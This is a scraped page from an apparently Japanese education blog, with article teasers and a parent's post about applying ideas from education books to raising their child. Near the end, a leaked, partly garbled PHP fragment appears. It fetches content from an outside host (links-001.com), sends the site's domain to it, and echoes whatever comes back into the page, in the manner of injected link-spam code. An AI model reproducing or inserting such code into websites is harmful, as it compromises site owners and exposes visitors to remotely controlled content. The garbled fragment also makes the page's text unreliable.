前へ
次へ

歴史から見る教育の受けさせない考え方

現代の日本人は、庶民が教育を受けるのは当たり前であり、教育によって国民の質が高まると考えるのが一般的

more

大学の統合は学生にとって良い変化か

ある大学を卒業した人はそれなりにその大学に愛着を持っているでしょう。
しかし大学の運営が難しく

more

趣味と実益を兼ねた勉強をすること

アロマテラピーを趣味としている人が通信教育で資格を取得して、アロマテラピーを仕事にするということもあ

more

教育に関しての本をよく読みます

教育をテーマにした本を読むことが多いです。
いろんな人がいろんな視点で教育を語っていたりするので、なかなかおもしろい内容な事が多いですし、子育ての参考にもなります。
基本的には自分と似た環境の人の教育論が参考になる気がします。
お金がない家なのに、裕福な家庭の教育を参考にしても仕方がありません。
今できる環境でベストな教育を探るべきです。
家庭環境や経済環境はもちろん、親や子供の性格なども考慮して、なるべく近い教育を参考にするのが秘訣だと思います。
本を読むだけで満足してはいけません。
その内容を実行する事が大切なので、なるべくいろんな事をやるようにしています。
子供が嫌がるような事は逆効果なので、なるべく楽しんで勉強できるような環境作りを行っています。
努力の甲斐があり、今のところ子供は素直にすくすく育っていますし、学力も比較的高いほうです。
親の私が言うのも何ですが、このままいけばけっこう優れた人間になってくれるはずです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top